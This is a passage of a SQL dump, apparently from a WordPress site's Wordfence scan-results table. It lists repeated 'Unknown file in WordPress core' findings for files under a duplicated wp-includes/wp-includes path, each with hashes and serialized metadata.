find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:86:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77976,1675048864,1675048864,'new','knownfile',75,'69a5cc07bfabbf5b34b42f0d6222fa74','0162bf378ac9de26544f8dd8f267223f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77977,1675048864,1675048864,'new','knownfile',75,'ffdd077ceeb1366fc94221839bca28fd','2d434f7fd2bf0759c35cd70449096c23','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77978,1675048864,1675048864,'new','knownfile',75,'44a4e1b5100ae4ffd804ace606b13f3d','087ceea0cafafd9840756c02fba7d771','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:80:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77979,1675048864,1675048864,'new','knownfile',75,'3475d0a18f07bafd4c1727c74dfc8ea3','2cacfd2dfca4bc34df17969bddd38d16','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77980,1675048864,1675048864,'new','knownfile',75,'c031562823b12eecea6c1351a5a63462','2f4a7bab741f7d229e36e5aa2ebc9f43','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:79:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77981,1675048864,1675048864,'new','knownfile',75,'080830e335547a845b954ab4bbdbcf9a','5dce5d1295e146acc205263e08a1dd3a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:85:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77982,1675048864,1675048864,'new','knownfile',75,'342c923cf53733360044ce4313e9925e','8ddd7fad0d827ff52350275955e48925','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77983,1675048864,1675048864,'new','knownfile',75,'d778c130552313ef1d9af6681853d56f','47492d69823774506f70a1008749aaeb','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77984,1675048864,1675048864,'new','knownfile',75,'13d100b9055dcc9bae9c0c39bbb53afb','5522beaaf1b2d748aa9c4cec2937a684','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77985,1675048864,1675048864,'new','knownfile',75,'df28d8dd7d3810647097cadf41c81b07','6d40c25260f6abae7947541ec9976f3f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77986,1675048865,1675048865,'new','knownfile',75,'0f2e4a97f2f2098dea74bf7272b1ff29','fa7136bd972c95463b7693c331034b28','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:80:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77987,1675048865,1675048865,'new','knownfile',75,'72bb5efbec7a2a7ab4e62514e7837a7f','10904225fbaeffdc30266c3feb2c31ad','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77988,1675048865,1675048865,'new','knownfile',75,'ea5159b9817553fc7c0fe1fa49dd0c51','b0d6d0735f1756fcde64696b59addb39','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77989,1675048865,1675048865,'new','knownfile',75,'5541218287b8c9c333fc0fb08845faa5','9e1fd2c4d7e8e4ccd71a857b971dd753','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77990,1675048865,1675048865,'new','knownfile',75,'e79bf589d1b16ec46701a495bb1850ef','6b1b817fa70d5fdcefd9a682a901f553','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77991,1675048865,1675048865,'new','knownfile',75,'fa14c6435e8b88431780175854f8bf4b','02e5462e441ca9c993e4d55fb86b060a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77992,1675048865,1675048865,'new','knownfile',75,'da6db30d1bebb558fa37676b025e1f68','160a890a47d0da76d829b273d7075069','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77993,1675048865,1675048865,'new','knownfile',75,'552f151d11b75ee4c9a0d57b5c3e2a80','a1dee403181dd8236e80a76257f5e01f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77994,1675048865,1675048865,'new','knownfile',75,'d436057eb28b42f6457a19d43f1076dd','91fd89071bc86b8bbf2759990da543a7','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77995,1675048865,1675048865,'new','knownfile',75,'3dd87f1408815d1855007cc206512bc0','a7519849e682840bd076cf87a7cb5641','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77996,1675048865,1675048865,'new','knownfile',75,'6ee53315c08fb9e8c509ac723993a77e','3abfcda9006c61ee7aa3b9cb0cf93a39','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77997,1675048865,1675048865,'new','knownfile',75,'81f073b84d2c3b41de36e11509a2cc2e','623e80da4e2963bef033444f6bd9c275','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:84:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77998,1675048865,1675048865,'new','knownfile',75,'68078dfcc823077d1d062fe4700e68fa','e269bd51cd82a9b6c3baec086ac85276','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77999,1675048865,1675048865,'new','knownfile',75,'47ee8f25d0e42be697ef770631f2c723','07894239b0022ce5b42ed1d8b70d4d1d','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78000,1675048865,1675048865,'new','knownfile',75,'6996024a0c887b10948e356cfa361a98','62e7d9964f4f5aa0d4819ae07da6437e','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78001,1675048865,1675048865,'new','knownfile',75,'4030816089848c72fdbb83f27b52f8af','7e803dbe4119fb7cd7361d5fada8a867','Unknown file in WordPress core: wp-includes/wp-includes/rest-api.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/rest-api.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78002,1675048865,1675048865,'new','knownfile',75,'3db7ed28d9cdbbf9e196ebb1250aaa87','9c01f8c3161f19c5f69ce2d85f657f99','Unknown file in WordPress core: wp-includes/wp-includes/revision.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/revision.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78003,1675048866,1675048866,'new','knownfile',75,'14468f7f5a58018cdeaa98b7a1cc3e5b','29242a392d6499d2fe055d17de0a7849','Unknown file in WordPress core: wp-includes/wp-includes/rewrite.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/rewrite.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78004,1675048866,1675048866,'new','knownfile',75,'1f895770f774366b1ccf52afa97f05cb','04778a7a224b0c68636b79617769be91','Unknown file in WordPress core: wp-includes/wp-includes/robots-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/robots-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78005,1675048866,1675048866,'new','knownfile',75,'c22f8db0347c95500172c952560c65f8','0d410346f0931e75ac78273d524ef83c','Unknown file in WordPress core: wp-includes/wp-includes/rss-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/rss-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78006,1675048866,1675048866,'new','knownfile',75,'1ae4930f6ab94db03278ebebbedc9a7b','fece73927e72dd21ad4bf51bfd89d7c5','Unknown file in WordPress core: wp-includes/wp-includes/rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:31:\"wp-includes/wp-includes/rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78007,1675048866,1675048866,'new','knownfile',75,'01a842690447a7ca4419a962e3be3dbb','2f833cdf54d11fbfa3053f10c705b15e','Unknown file in WordPress core: wp-includes/wp-includes/script-loader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/script-loader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78008,1675048866,1675048866,'new','knownfile',75,'e3f876f6a51baeef641c6b83dc9de233','e171f5c57f9067cb7a9f37697991ca4f','Unknown file in WordPress core: wp-includes/wp-includes/session.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/session.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78009,1675048866,1675048866,'new','knownfile',75,'193c572d13ff71059ceba35fda188b1e','068ed399e4047ba287cf0dc054d0b078','Unknown file in WordPress core: wp-includes/wp-includes/shortcodes.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/shortcodes.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78010,1675048866,1675048866,'new','knownfile',75,'30c8e63b025a994ca2e2611aa541cca9','d30b085bd3d4b290ae1f6f1e15691393','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78011,1675048866,1675048866,'new','knownfile',75,'c32bedba06761478ddf8ff84a2fef259','b18b0fe65637f86ca0d95d64005c123e','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span 